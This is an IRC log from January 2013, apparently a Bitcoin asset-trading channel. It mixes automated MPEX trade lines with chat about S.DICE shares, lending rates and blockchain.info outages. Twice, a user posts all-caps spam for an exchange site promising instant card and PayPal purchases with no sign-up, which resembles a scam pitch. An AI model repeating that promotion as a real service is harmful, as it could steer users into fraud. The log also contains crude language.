[S.MPOE] 9271 @ 0.00062874 = 5.829 BTC [-] Jan 02 18:59:36 mircea_popescu: i solved the bounty Jan 02 18:59:40 100 btc please Jan 02 19:00:02 [MPEX] [S.DICE] 457 @ 0.0036707 = 1.6775 BTC [+] Jan 02 19:00:04 [MPEX] [S.DICE] 1800 @ 0.00367109 = 6.608 BTC [+] Jan 02 19:00:05 [MPEX] [S.DICE] 2143 @ 0.00367193 = 7.8689 BTC [+] Jan 02 19:02:25 thestringpuller link ? Jan 02 19:02:47 i kid but srsly i have info Jan 02 19:02:53 i work probono Jan 02 19:03:41 so post it Jan 02 19:04:36 soon. i need to trace further back. Jan 02 19:04:48 i think i can pin point it to a single chunk of btc Jan 02 19:05:54 if dice is betting with itself...then its very good at obfuscating Jan 02 19:06:19 how about I give you my results and you write the whitepaper? ;) Jan 02 19:08:56 [MPEX] [S.DICE] 657 @ 0.00367193 = 2.4125 BTC [+] Jan 02 19:08:58 [MPEX] [S.DICE] 2896 @ 0.00369999 = 10.7152 BTC [+] Jan 02 19:08:59 [MPEX] [S.DICE] 1087 @ 0.0037 = 4.0219 BTC [+] Jan 02 19:18:40 you can just post a comment under the article Jan 02 19:18:46 plenty of people there might carry it further. Jan 02 19:20:06 wait Jan 02 19:20:12 is Evoorhees part of bitinstant ? Jan 02 19:20:28 with yankee ? Jan 02 19:20:30 man, i always read that as "ever hoes" Jan 02 19:20:53 I keep reading it as e-whorees Jan 02 19:21:56 ;;tslb Jan 02 19:22:00 Time since last block: 50 minutes and 52 seconds Jan 02 19:22:17 Ukto yea Jan 02 19:22:55 mircea_popescu: partners ? Jan 02 19:23:03 I might have to pull some strings then... Jan 02 19:23:14 well yes, hes' listed on the page and all. Jan 02 19:23:16 what strings be those ? Jan 02 19:25:11 https://bitcointalk.org/index.php?topic=131778.msg1430691#msg1430691 Jan 02 19:25:13 derp Jan 02 19:27:12 lol Jan 02 19:27:35 ? Jan 02 19:27:43 Hello by the way Jan 02 19:28:23 My dad is die and my wife's dad is die. Jan 02 19:28:23 My mother do not have money to send me, she is living other city and contains my little brother. Jan 02 19:28:23 My wife's mother is living other city and contains my wife's little brother and my wife's litte sister. Jan 02 19:28:34 i know i know its sad, but its also a bit funny. Jan 02 19:29:00 Namjies was re jcpham earlier. Jan 02 19:29:02 "Our current superconducting 128-qubit processor chip is housed inside a cryogenics system within a 10 square meter shielded room." wow Jan 02 19:29:07 kakobrekla i actually sent the guy monyz. Jan 02 19:29:14 you did? Jan 02 19:29:15 ? Jan 02 19:30:19 yeah. Jan 02 19:30:41 Ukto: i pull the strings!!! Jan 02 19:30:43 0.001? Jan 02 19:30:51 a tease then. Jan 02 19:31:22 thestringpuller: Nuuu Jan 02 19:32:36 or was it 5btc? Jan 02 19:34:21 kakobrekla 5 btc Jan 02 19:34:49 mircea_HOOD_popescu Jan 02 19:35:13 jcpham http://polimedia.us/dtng/c/res/283.html there. Jan 02 19:35:20 hood ? why hood ? Jan 02 19:35:27 hood, robin hood Jan 02 19:36:45 lol Jan 02 19:41:48 "The problem with geologists is that they invented such a complicated language that it would be easier to understand a half-naked Papuan stepping out of a jungle in the Stone Age than a bunch of dressed-up geologists attending a conference in Vancouver or Toronto – well, unless they step out of the room to grab a beer and begin taking on mundane subjects like good bars, sports, and field equipment." Jan 02 19:41:54 wtf who allows all these idiots on the internet. Jan 02 19:43:37 The low price of an internet connection allows them. Jan 02 19:43:48 That's all it requires Jan 02 19:44:07 rich doesnt mean not idiot Jan 02 19:45:40 btw kakobrekla Jan 02 19:45:45 did mtgox shut off api 0 ? Jan 02 19:47:33 Ukto ya Jan 02 19:47:57 asshats.. Jan 02 19:48:03 did you ever find good docs? Jan 02 19:48:09 there are none Jan 02 19:49:24 It's not an absolute, but there's high correlation. Jan 02 19:50:07 The opposite is not true however. Jan 02 19:50:36 Ukto here https://bitcointalk.org/index.php?topic=133829.msg1424948#msg1424948 Jan 02 19:50:52 i concider this about the same as 'go fuck yourself' Jan 02 19:51:04 anyway i have more important things to do and a year of backlog Jan 02 19:55:11 I find it interesting that I'm starting to get reasonable interest on loans. Jan 02 19:55:31 blame mpbor Jan 02 19:56:09 whats the size of mpbor these days Jan 02 19:56:34 4.9 last iirc Jan 02 19:56:42 5k? Jan 02 19:57:10 mpbor carries risk? Jan 02 19:57:29 5k, that i can beat :> Jan 02 19:58:53 4.9% Jan 02 19:58:57 and yes namjies Jan 02 19:59:08 no, the size i wonder Jan 02 19:59:23 amount of coinage Jan 02 19:59:28 I prefer to sell PUT options Jan 02 19:59:38 fiscal cliff Jan 02 19:59:39 50k? Jan 02 20:02:36 I'm getting early SatoshiDice kind of interest charged. Jan 02 20:02:37 fiscal cliff would be good for Europe, lets hope for it Jan 02 20:02:47 or about 1% per month Jan 02 20:03:20 Even less, actually Jan 02 20:07:56 + the 200% loan value in assets guarantee is gone Jan 02 20:09:11 Well, my Intermediate bond index fund has an SEC yield of 1.5% a year, so sounds like you are doing well. Jan 02 20:10:54 I'd prefer 1.5% a year Jan 02 20:11:35 I'm the bond issuer. Jan 02 20:11:59 But going under 1% per month on BTC, I'll consider it an achievement. Jan 02 20:30:03 [MPEX] [S.DICE] 3000 @ 0.00359126 = 10.7738 BTC [-] Jan 02 20:35:59 kakobrekla size was from 40k btc to like 7ish Jan 02 20:39:19 hum? Jan 02 20:39:26 went down from 40 to 7 now? Jan 02 20:39:34 how come? Jan 02 20:39:41 price stability? Jan 02 20:39:53 not much volatility in exchange rate last month Jan 02 20:40:07 order in which the contracts were bot or sold? Jan 02 20:40:16 it's odd cause it traded about the same # of contracts, roughly Jan 02 20:40:19 what does the size of the fund has to do with that? Jan 02 20:40:19 maybe 15% less Jan 02 20:40:23 but much more capital intensive Jan 02 20:40:46 kakobrekla the capital needed simply reflects the widest berth mpoe bot ever takes. Jan 02 20:40:55 yeah, but if you are well balananced in exposure throughout the period, the the bond requirements will be lower Jan 02 20:40:56 you can trade millions of btc's worth within the same 100btc space in principle Jan 02 20:41:03 yeah Jan 02 20:41:10 Bugpowder in principle it could make a million btc on 0 capital. Jan 02 20:41:15 well Jan 02 20:41:18 maybe 1btc Jan 02 20:41:20 so it fluctuates widely. Jan 02 20:41:31 I finally read how its calculated Jan 02 20:41:33 well... admitting someone sells and someone buys simultaneously. Jan 02 20:41:40 obviously this is a theoretical proposition Jan 02 20:46:22 ;;ticker Jan 02 20:46:23 BTCUSD ticker | Best bid: 13.26991, Best ask: 13.34999, Bid-ask spread: 0.08008, Last trade: 13.34999, 24 hour volume: 14943.19679685, 24 hour low: 13.21100, 24 hour high: 13.40000, 24 hour vwap: 13.31395 Jan 02 21:17:32 [MPEX] [S.DICE] 1750 @ 0.0037 = 6.475 BTC [+] Jan 02 21:29:45 incidentally, this is a rarely well written and entertaining article http://www.nytimes.com/2011/05/15/magazine/mag-15Gold-t.html Jan 02 21:56:38 That IS a nice article Jan 02 21:57:04 yeah Jan 02 21:57:11 PURCHASE BITCOINS RIGHT NOW INSTANTLY WITH YOUR DEBIT/CREDIT CARD AND PAYPAL GO TO WWW.BITCOINBERUDECHANGE.COM NO SIGN UP AT ALL JUST WIZ THROUGH IT SPREAD THE WORD !!!! Jan 02 21:57:12 i even dropped the author a line let him know. so rare these days Jan 02 21:57:14 PURCHASE BITCOINS RIGHT NOW INSTANTLY WITH YOUR DEBIT/CREDIT CARD AND PAYPAL GO TO WWW.BITCOINBERUDECHANGE.COM NO SIGN UP AT ALL JUST WIZ THROUGH IT SPREAD THE WORD !!!! Jan 02 21:58:51 It's the "beru de change" thing... these guys don't know how to spell "bureau de change" Jan 02 21:59:17 Someone suggested it was instead "Be Rude" Jan 02 22:01:39 haha Jan 02 22:03:38 Yeah that was a great article Jan 02 22:03:43 one of my favs Jan 02 22:07:08 you read it ?! Jan 02 22:07:53 kakobrekla seems the ban failed ? Jan 02 22:11:34 [MPEX] [S.MPOE] 27684 @ 0.00062874 = 17.406 BTC [-] Jan 02 22:11:35 [MPEX] [S.MPOE] 816 @ 0.00062839 = 0.5128 BTC [-] Jan 02 22:12:39 yes I read it back when it came out Jan 02 22:12:42 NYT addict Jan 02 22:13:21 forwarded it to my gold bug friends too Jan 02 22:22:59 cool Jan 02 22:23:05 i used to read the nyt like in the 90s Jan 02 22:23:18 these days the press is kinda gone Jan 02 23:00:54 [MPEX] [S.MPOE] 610 @ 0.00063408 = 0.3868 BTC [+] Jan 02 23:00:55 [MPEX] [S.MPOE] 19233 @ 0.00064091 = 12.3266 BTC [+] Jan 02 23:07:32 [MPEX] [S.MPOE] 3300 @ 0.00064243 = 2.12 BTC [+] Jan 02 23:21:40 it reminded me of a story by Jack London a bit Jan 02 23:23:56 can't remember its name. Jan 02 23:55:55 [MPEX] [S.MPOE] 12225 @ 0.00064243 = 7.8537 BTC [+] Jan 02 23:55:56 [MPEX] [S.MPOE] 7288 @ 0.00065 = 4.7372 BTC [+] Jan 03 00:12:12 [MPEX] [S.MPOE] 16100 @ 0.00065 = 10.465 BTC [+] Jan 03 00:17:42 [MPEX] [S.DICE] 1957 @ 0.00359126 = 7.0281 BTC [-] Jan 03 00:26:38 https://bitfunder.com/asset/CoinBr.MPBPT-E Jan 03 00:27:05 February MPOE bonds passthroughnow open. First moment buyers will get best price! Jan 03 00:27:38 And check bitfunder announcement for extra lulz :) Jan 03 00:32:01 Couldn't these be made available on coinbr? Jan 03 00:33:11 ;;seen Ukto Jan 03 00:33:11 Ukto was last seen in #bitcoin-assets 4 hours, 45 minutes, and 8 seconds ago: did you ever find good docs? Jan 03 00:33:23 ? Jan 03 00:33:33 Ukto: it just happend again Jan 03 00:33:41 lemme looksee Jan 03 00:34:29 Namjies, I'd have to add more code as coinbr is not an exchange itself. Plus it made Ukto so happy. Jan 03 00:34:57 false alarm :P Jan 03 00:35:14 jurov: it did, thanks! :) Jan 03 00:35:58 lol Jan 03 00:36:00 Ukto: yup, my fault Jan 03 00:38:44 mircea_popescu, have you seen what i put into the bitfunder news? Jan 03 00:38:52 no ? Jan 03 00:39:28 https://bitfunder.com/news , click to unfold Jan 03 00:51:41 im actually from cluj Jan 03 00:51:46 which is the very heart of transylvania Jan 03 00:51:56 the girls are majoritarily from the us but generally from all over Jan 03 00:55:04 :) Jan 03 01:34:21 Ukto: Heard from DeadTerra 'bout G.SDICE dividends? Jan 03 01:41:30 arg, f-ing credit card companies Jan 03 01:42:00 make a purchase, declined. call, get it manually approved, make the next purchase... declined Jan 03 01:42:12 FFFFFFFUUUUUUUUUUUU Jan 03 01:49:53 smickles, use rg's method Jan 03 01:53:02 what's rg's method? Jan 03 01:53:55 he was asking every day in -otc who'll order and pay him a pizza Jan 03 01:53:59 give someone btc to make cc purchases Jan 03 01:54:04 ah Jan 03 01:54:20 jurov: he did it for data center payments too Jan 03 01:54:34 a bit higher ticket than just lunch Jan 03 01:55:31 speaking of which, if anyone wants to buy me a somethingawful account i'll pay teh btc . Jan 03 01:55:49 you have to buy sa accounts? Jan 03 01:57:01 yeah Jan 03 01:58:09 it's 9.95 and they take cc only Jan 03 01:58:15 as if anyone actually does that.e Jan 03 02:07:00 Well, I've sworn of CCs for today at least Jan 03 02:10:36 kakobrekla in yo face https://bitcointalk.org/index.php?topic=128650.msg1430666#msg1430666 Jan 03 02:11:00 Santa Claus is exist! Jan 03 02:11:37 so its mircea_claus_popescu Jan 03 02:11:40 same shit. Jan 03 02:11:41 lmao teh clueless noob hasn't quite figured it out yet lol Jan 03 02:32:58 mircea you forgot to add the "My dad is died and my wife's dad is died...." part Jan 03 02:33:16 im sure some city still contains em Jan 03 02:34:24 lol Jan 03 02:34:36 it's so funny tho. Jan 03 02:34:49 but to anyone suspecting this was an ellaborate ploy : if the guy is this good... Jan 03 02:35:33 [MPEX] [S.MPOE] 17200 @ 0.00065 = 11.18 BTC [+] Jan 03 02:37:38 https://bitcointalk.org/index.php?topic=112447.msg1431414#msg1431414 Jan 03 02:37:39 hm Jan 03 02:38:03 so its like playing less than 52000 Jan 03 02:38:30 but the 'interests' rate on sidce are better Jan 03 02:39:26 The current repayment rate is aprox 77%, if you think dice games are better than this please stay away of peer to peer lending sites. Jan 03 02:39:27 ahaha Jan 03 02:39:33 well... sdice repayment rate is 98.1% Jan 03 02:40:50 SatoshiDice does not deliver interests however and by selecting well rated loaners, you can drastically increase repayment rate. Jan 03 02:41:40 If you can get 95% repayment rate, with the interest, you'd end up in the green. Jan 03 02:43:06 I even got a 4% per week loan over 2 month repaid in full with interest. Jan 03 02:45:16 [MPEX] [S.DICE] 1050 @ 0.00363054 = 3.8121 BTC [+] Jan 03 02:45:17 [MPEX] [S.DICE] 710 @ 0.0037 = 2.627 BTC [+] Jan 03 02:46:52 But I didn't want to push my luck too much tho. It's almost just like gambling. Jan 03 02:50:50 pigeons: yes, divs will be paid out soon Jan 03 03:15:08 Namjies i really have my doubts about it Jan 03 03:15:24 i suspect pigeon's loadning to jurov will probably be half or a third of the actually repaid loans Jan 03 03:15:33 and the fact of the matter is they could have dealt with or w/o btcjam Jan 03 03:16:49 unrelatedly, if anyone's into browser gamers, try out http://trilema.com/2012/wartune/ Jan 03 03:16:52 it's pretty advanced. Jan 03 03:56:05 mircea_popescu: you sure its not japanese? or korean ? Jan 03 03:56:16 its chinese i think. Jan 03 03:56:20 but pretty good, for srs. Jan 03 04:20:18 [MPEX] [S.MPOE] 607 @ 0.00064099 = 0.3891 BTC [-] Jan 03 04:20:18 [MPEX] [S.MPOE] 10400 @ 0.00063446 = 6.5984 BTC [-] Jan 03 04:20:20 [MPEX] [S.MPOE] 1934 @ 0.00062839 = 1.2153 BTC [-] Jan 03 04:20:21 [MPEX] [S.MPOE] 1275 @ 0.00062834 = 0.8011 BTC [-] Jan 03 05:07:59 [MPEX] [S.MPOE] 4300 @ 0.00064915 = 2.7913 BTC [+] Jan 03 05:08:01 [MPEX] [S.MPOE] 1439 @ 0.00062834 = 0.9042 BTC [-] Jan 03 05:25:13 [MPEX] [S.DICE] 2450 @ 0.0037 = 9.065 BTC [+] Jan 03 05:28:10 [MPEX] [S.DICE] 2600 @ 0.0037 = 9.62 BTC [+] Jan 03 06:28:06 [MPEX] [S.MPOE] 15800 @ 0.00065 = 10.27 BTC [+] Jan 03 07:08:49 [MPEX] [S.DICE] 1154 @ 0.00366266 = 4.2267 BTC [-] Jan 03 07:56:49 [MPEX] [S.MPOE] 2250 @ 0.00064316 = 1.4471 BTC [-] Jan 03 07:56:50 [MPEX] [S.MPOE] 5250 @ 0.00064162 = 3.3685 BTC [-] Jan 03 07:58:23 [MPEX] [S.MPOE] 3800 @ 0.00064712 = 2.4591 BTC [+] Jan 03 08:22:18 [MPEX] [S.DICE] 1046 @ 0.00366266 = 3.8311 BTC [-] Jan 03 08:23:49 [MPEX] [S.DICE] 1947 @ 0.00359126 = 6.9922 BTC [-] Jan 03 08:23:51 [MPEX] [S.DICE] 704 @ 0.00357934 = 2.5199 BTC [-] **** BEGIN LOGGING AT Thu Jan 3 16:05:16 2013 Jan 03 16:08:48 [MPEX] [S.MPOE] 10250 @ 0.00064021 = 6.5622 BTC [-] Jan 03 16:37:03 [MPEX] [S.MPOE] 1106 @ 0.00064021 = 0.7081 BTC [-] Jan 03 16:37:04 [MPEX] [S.MPOE] 3453 @ 0.00063961 = 2.2086 BTC [-] Jan 03 16:57:14 [MPEX] [S.DICE] 930 @ 0.00368308 = 3.4253 BTC [+] Jan 03 16:57:15 [MPEX] [S.DICE] 20 @ 0.00369389 = 0.0739 BTC [+] Jan 03 17:06:57 https://bitcointalk.org/index.php?topic=128650.msg1432062#msg1432062 lmao Jan 03 17:32:58 [MPEX] [S.DICE] 1700 @ 0.00362958 = 6.1703 BTC [-] Jan 03 18:15:23 EskimoBob where is art listed? Jan 03 18:26:15 "This means that the biggest risk of our project is gone and our NRE is a fruitful spend." Jan 03 18:26:20 so asicminer will actually deliver ? Jan 03 18:28:03 [MPEX] [S.DICE] 1880 @ 0.00369389 = 6.9445 BTC [+] Jan 03 18:28:04 [MPEX] [S.DICE] 6870 @ 0.0037 = 25.419 BTC [+] Jan 03 18:35:28 I LOVE that the S.MPOE trading bot has now moved over to trading S.DICE Jan 03 18:36:07 hello, anyone to affiliate me ? Jan 03 18:36:40 where? Jan 03 18:36:52 MPEX Jan 03 18:36:57 yes Jan 03 18:37:04 what's you Keyid Jan 03 18:37:08 MP Jan 03 18:50:45 [MPEX] [S.DICE] 1186 @ 0.0037 = 4.3882 BTC [+] Jan 03 18:57:07 [MPEX] [S.DICE] 1158 @ 0.00369264 = 4.2761 BTC [-] Jan 03 18:57:08 [MPEX] [S.DICE] 97 @ 0.00362958 = 0.3521 BTC [-] Jan 03 18:57:10 [MPEX] [S.DICE] 375 @ 0.00361855 = 1.357 BTC [-] Jan 03 18:57:11 [MPEX] [S.DICE] 5070 @ 0.00360414 = 18.273 BTC [-] Jan 03 19:07:37 that was weird ? Jan 03 19:19:03 http://www.wired.com/threatlevel/2013/01/coder-charged-for-gambling-software/ the ever fascinating us Jan 03 19:20:07 yay, blockchain.info down Jan 03 19:20:17 -_- Jan 03 19:20:38 who wanted to use them as a payment gateway? Jan 03 19:20:41 I suggest not Jan 03 19:21:34 time for a blockchain.info payable and stable alternative Jan 03 19:21:46 mircea_popescu : yeah I'm sure Erik loves seeing that story. Jan 03 19:22:02 kakobrekla: about 2 months Jan 03 19:22:35 heh Jan 03 19:22:44 Ukto it was announced. Jan 03 19:23:08 hm Jan 03 19:30:25 what was announced? Jan 03 19:30:33 downtime Jan 03 19:30:39 o Jan 03 19:30:56 they should have downtime annoncment api Jan 03 19:31:42 that doesn't go down Jan 03 19:31:49 ofc Jan 03 19:32:34 so users would be able to ensure at least some level of service quality Jan 03 19:43:30 [MPEX] [S.DICE] 3100 @ 0.0037 = 11.47 BTC [+] Jan 03 20:01:01 there;s certainly space in the market for more than one blockchain.info Jan 03 20:01:52 they owned blockexplorer cause that was kept mostly academicly, no serious effort Jan 03 20:02:03 mircea_popescu, i'm about to invest in the stock market but please explain me what's the f*** is wrong with the Porn hosted on the same domain ? Jan 03 20:02:19 private joke or something ?? Jan 03 20:04:01 what wrong with the porn? Jan 03 20:04:01 kuzetsa: coinbr alleviates the need to pay for mpex account, plus adds user interface and bookkeeping... wouldn't say it's weird :) Jan 03 20:04:03 is it censored? Jan 03 20:05:01 anybody: coinbr.com doesn't require invitations anymore, they are useful for affiliate payments Jan 03 20:05:29 perhaps should update the frontpage stuff to make it clear Jan 03 20:05:31 StarenseN what domain is that ? Jan 03 20:07:41 http://polimedia.us/dtng/** Jan 03 20:07:56 still, whats wrong with it? Jan 03 20:08:02 is it censored? pizelated? Jan 03 20:08:08 pixelated? Jan 03 20:08:22 use mpex.co and its on a different domain suddenly. Jan 03 20:08:47 not censored Jan 03 20:09:02 StarenseN if you want to take it that way, it's proof of strength. Jan 03 20:09:07 then whats wrong with it? Jan 03 20:09:14 the porn in question is older on the internet than btc itself, and than any other bitcoin service Jan 03 20:09:27 are the bitches too old? Jan 03 20:09:29 taaki tried to get my site offline by complaining to anyone and everyone about "child porn" Jan 03 20:09:34 the site is still there, taaki is gone Jan 03 20:09:36 so you get the idea. Jan 03 20:09:41 Ukto, go to bitcointalk and write somewhere "I started new exchange, cause i can't use mpex cause the porn is too pixelated" Jan 03 20:09:54 that's ok, but why don't you dedicate ONE server for the stock market Jan 03 20:09:56 jurov: lol Jan 03 20:09:59 it's out of my mind Jan 03 20:10:12 [12:10] use mpex.co and its on a different domain suddenly. Jan 03 20:10:17 i do. Jan 03 20:10:18 kakobrekla already told you Jan 03 20:10:27 what you see is just the webserver. Jan 03 20:11:00 under your related domain that is also existing for MPEX Jan 03 20:11:10 anyway Jan 03 20:11:21 no. Jan 03 20:11:23 are you that offended by it? Jan 03 20:11:41 there is a webserver which is pretty well secured for this purpose, which conduits your communications. Jan 03 20:11:46 mpex itself is on a diff machine. Jan 03 20:11:49 (s) Jan 03 20:11:51 http://polimedia.us/dtng/f/ Jan 03 20:11:51 http://polimedia.us/bitcoin/mpex.php Jan 03 20:11:53 no? Jan 03 20:12:04 [12:10] use mpex.co and its on a different domain suddenly. Jan 03 20:12:04 mpex doesn't run on the server you talk to. Jan 03 20:12:15 no Ukto i don't care Jan 03 20:12:16 think of it as a proxy, except the other way around. Jan 03 20:12:18 ok Jan 03 20:12:26 just like your traffic at home goes through your isp's proxy Jan 03 20:12:40 just so my servers face the internet through a single webserver Jan 03 20:12:44 StarenseN: they are both the same thing.. they both talk to the actual mpex server Jan 03 20:13:12 your just mad because one has porn, and refuse to use the one without ? Jan 03 20:13:16 and this is so because securing webservers is complex and expensive and you really don't want to do it multiple times if it can be helped Jan 03 20:13:22 (if you know anything about it, that is) Jan 03 20:13:49 ok this is out of this world : Jan 03 20:13:50 Stuart asserts that New York authorities only came after him because they wanted to use him as a conduit to uncover illegal gambling operations in that state. He says the New York district attorney’s office tried to strong-arm him into a plea agreement that would have had him hacking into the systems of his software clients in order to obtain the usernames and passwords of gamblers and their bookmakers to help author Jan 03 20:13:50 ities gather evidence of illegal gambling. Jan 03 20:14:03 Under plea agreement discussions that were never finalized by a judge, and that occurred in February 2011 before Stuart was charged with any crime, Stuart says New York authorities pressed him to install a backdoor in his software and distribute it to clients so the data of gamblers and bookmakers could be retrieved. Jan 03 20:14:13 mo: just reading that ? lol Jan 03 20:14:24 it's just... wow. Jan 03 20:14:29 just shows you how shady the govt is Jan 03 20:14:39 then there is the story there, about using predators to kill americans Jan 03 20:14:46 after that one, i closed the site Jan 03 20:14:53 and started to dream of another country agian Jan 03 20:15:02 there is a law firm in atlanta that is sending infringement claims Jan 03 20:15:02 the alien vs predator predator or some different predator Jan 03 20:15:11 based on scan to pdf process patent Jan 03 20:15:16 "paperless office" Jan 03 20:15:21 armed predatorr drones Jan 03 20:15:33 a. Jan 03 20:15:39 pretty easy to be on the wrong side of the law or copyright these days Jan 03 20:15:51 i know a federal DA Jan 03 20:16:11 who never broke copyright law, throw the first stone Jan 03 20:16:13 she got real serious during lunch once. and said "I can put you in federal prison for 5 years for eating that sandwich. No shit." Jan 03 20:16:15 fucking outrageos Jan 03 20:16:25 "There is no such thing as "legal"." Jan 03 20:17:42 http://www.runtogold.com/2012/12/during-2012-fiat-currencies-and-gold-collapse-against-bitcoin Jan 03 20:17:46 bulls on parade Jan 03 20:18:18 there is a huge list of illegal things, and much larger list of items that are 'gray areas' that could be used to make 'legal seeming things' illegal. Jan 03 20:18:46 my head assploded seeing that gold site omg ouch. Jan 03 20:24:09 http://trilema.com/2013/whats-a-rogue-state/ mthere. Jan 03 20:24:34 mircea_popescu: is a rogue state Jan 03 20:24:50 jcpham i'd really like to get mpex on some of these golbug sites etc. you know anyone ?\ Jan 03 20:25:12 unsure Jan 03 20:25:26 know would mean less than iknow you Jan 03 20:25:57 at the bottom, in the comments Jan 03 20:26:04 matonis has a forum account Jan 03 20:26:23 the forbes blogger guy Jan 03 20:27:02 [MPEX] [S.DICE] 1396 @ 0.00364994 = 5.0953 BTC [-] Jan 03 20:27:09 MP let me work on that Jan 03 20:28:21 if nothing else i can start with the guy that shared that link with me Jan 03 20:29:00 np Jan 03 20:39:38 mircea_popescu, i added info on http://talkgold.com, got few hits, but that was all Jan 03 20:39:55 im thinking bigger ticket sort of thing Jan 03 20:39:55 perhaps luring some known goldbug blogger would be better Jan 03 20:40:06 two page spread in a mag or w/e Jan 03 20:40:48 with some material from dtng? totally :P Jan 03 20:42:02 [MPEX] [S.DICE] 16233 @ 0.0037 = 60.0621 BTC [+] Jan 03 20:42:11 yesss Jan 03 20:42:23 355,000 to go Jan 03 20:44:35 jurov lmao Jan 03 20:45:51 blockchain.info down? Jan 03 20:46:09 https://bitcointalk.org/index.php?topic=134461.0 Jan 03 20:46:14 for hours now Jan 03 20:46:19 not much longer Jan 03 20:46:33 thx Jan 03 20:57:26 poor blockexplorer.com: ERROR: unknown (Most likely my bitcoind stopped working or this page is too large/complex.) Jan 03 20:57:42 lol Jan 03 20:57:46 disaster Jan 03 20:58:12 heh Jan 03 20:58:16 is anything like blockchain info opensourced Jan 03 20:58:20 so who's working on the 3rd ? Jan 03 20:58:36 it needs a bitcoind mod which iirc is somewhere online Jan 03 20:58:46 and a interface Jan 03 20:59:57 and redundancy Jan 03 21:00:31 ya well to bad im busy coding robots Jan 03 21:15:09 [MPEX] [S.DICE] 9200 @ 0.0037 = 34.04 BTC [+] Jan 03 21:23:29 kakobrekla: there is an opensource blockexplorer called ABE Jan 03 21:24:37 hm Jan 03 21:24:40 could be useful Jan 03 21:24:57 wow people (blockchain.info) use mac's for servers Jan 03 21:25:08 thats why is down all the tim Jan 03 21:25:09 e Jan 03 21:25:34 [MPEX] [S.DICE] 450 @ 0.0037 = 1.665 BTC [+] Jan 03 21:27:56 uh-oh QE3 may end within the year Jan 03 21:28:06 my bonds! Jan 03 21:29:23 um ? Jan 03 21:29:53 [MPEX] [S.MPOE] 1575 @ 0.00063961 = 1.0074 BTC [-] Jan 03 21:29:55 [MPEX] [S.MPOE] 3035 @ 0.00063773 = 1.9355 BTC [-] Jan 03 21:34:34 If yields go up after QE3 ends, bonds are going to get fucking crushed Jan 03 21:36:29 so sell Jan 03 21:36:49 tho this "qe may end" talk is ridiculous bullshit. Jan 03 21:36:54 the day qe ends the us economy ends. Jan 03 21:37:01 there's nothing left but inflation by now. Jan 03 21:38:48 speaking of porn board, http://polimedia.us/dtng/c/res/15234.html#18007 Jan 03 21:39:02 i don't sell Jan 03 21:42:02 [MPEX] [S.MPOE] 2415 @ 0.00063773 = 1.5401 BTC [-] Jan 03 21:42:03 [MPEX] [S.MPOE] 7185 @ 0.00063594 = 4.5692 BTC [-] Jan 03 21:42:30 mircea_popescu i put out a feeler and someone has offered me anything i want for a mpex account Jan 03 21:42:35 this isn't looking good Jan 03 21:42:49 lol wha ?! Jan 03 21:42:51 why not good ? Jan 03 21:42:51 i thought mpex accounts were 20btc and some gpg-fu Jan 03 21:42:59 they're 30 Jan 03 21:43:19 idk Jan 03 21:43:31 "i'll do anything you want" makes me feel icky Jan 03 21:43:37 lol! Jan 03 21:43:43 girl at least ? Jan 03 21:43:51 i don't think so at all Jan 03 21:43:55 smh Jan 03 21:44:35 so whats a gold eagle go for these days ? over 30 btc ? Jan 03 21:44:53 if this person isn't crazy and runs some awesome gold blog, can they have a free mpex account? Jan 03 21:45:00 i'd say no myself and make them pay 30btc Jan 03 21:45:04 that's me though Jan 03 21:45:23 [MPEX] [S.DICE] 60000 @ 0.0037 = 222 BTC [+] Jan 03 21:45:28 exchange it for 30btc worth of adverts Jan 03 21:45:31 well, kinda hard to run a blog 30btc worth of awesome, but not impossible Jan 03 21:45:40 yeah, something like that. Jan 03 21:45:51 [MPEX] [S.DICE] 600 @ 0.00366137 = 2.1968 BTC [-] Jan 03 21:45:55 i'm not going to bother you with anyone i haven't vetted Jan 03 21:46:14 tho im not even sure what someone'd do with an acct if no monyz in it Jan 03 21:46:42 urite Jan 03 21:46:52 nwhenuriteurite Jan 03 21:47:03 S.DICEEEEE Jan 03 21:49:15 Bugpowder i wouldn't get my hopes up. people will discover -EV and stop betting anytime now. Jan 03 21:49:55 My analysis "The New York district attorney’s office says his software was used to make illegal bets in that state between Sept. 2008 and June 2011." So we have about 3 years left of bountiful plenty Jan 03 21:50:33 on the theory that the us lasts till 2015. Jan 03 21:50:52 lol Jan 03 21:51:05 you eastern europeans Jan 03 21:51:16 suspicious of anything made recently. Jan 03 21:51:52 I kinda just want my options deposits back so I can buy through the rest of S.DICE.... Jan 03 21:52:01 getting close Jan 03 21:52:06 could be today. Jan 03 21:54:45 !ticker s.dice Jan 03 21:54:47 [MPEX:S.DICE] 1day: 0.00353735 / 0.00368454 / 0.0037 (139209 shares, 512.92 BTC), 30day: 0.0014 / 0.00328132 / 0.0037 (12915175 shares, 42,378.87 BTC) Jan 03 21:57:06 possibly Jan 03 21:57:40 course, if the guy that butchered the last tier with his 10k was only really just beginning... Jan 03 22:06:26 [MPEX] [S.MPOE] 16315 @ 0.00063594 = 10.3754 BTC [-] Jan 03 22:06:28 [MPEX] [S.MPOE] 1385 @ 0.00063258 = 0.8761 BTC [-] Jan 03 22:29:26 http://www.youtube.com/watch?v=Rr2vOuN68zw&hd=1 Jan 03 22:49:42 http://www.wired.com/threatlevel/2013/01/coder-charged-for-gambling-software/ Jan 03 22:50:01 honeybadger http://trilema.com/2013/whats-a-rogue-state/ :p Jan 03 22:50:58 strutting around in their costumes Jan 03 22:52:37 anyone here want some of my ppusd? Jan 03 22:52:53 this is getting a little bit crazy, 10 deposits the past 5 hours Jan 03 22:53:14 ?? Jan 03 22:53:32 must buy more dice Jan 03 22:53:52 [MPEX] [S.DICE] 1519 @ 0.00366088 = 5.5609 BTC [-] Jan 03 22:55:42 [MPEX] [S.DICE] 5546 @ 0.0037 = 20.5202 BTC [+] Jan 03 22:55:43 i guess not everyone that wanted some got it yet Jan 03 22:56:26 something is happening Jan 03 22:56:26 [MPEX] [O.BTCUSD.C120T] 1 @ 0.16974811 BTC [+] Jan 03 22:56:39 [MPEX] [O.BTCUSD.P120T] 1 @ 0.09101032 BTC [+] Jan 03 22:56:56 y u no wait bb Jan 03 22:56:58 [MPEX] [O.BTCUSD.C130T] 1 @ 0.148 BTC [-] Jan 03 22:57:10 [MPEX] [O.BTCUSD.P130T] 1 @ 0.132 BTC [-] Jan 03 22:57:18 it's coinbr users ;) Jan 03 22:57:25 [MPEX] [O.BTCUSD.C140T] 1 @ 0.113 BTC [-] Jan 03 22:57:38 [MPEX] [O.BTCUSD.P140T] 1 @ 0.168 BTC [+] Jan 03 22:57:52 [MPEX] [O.BTCUSD.C150T] 1 @ 0.07680901 BTC [-] Jan 03 22:58:05 [MPEX] [S.MPOE] 6621 @ 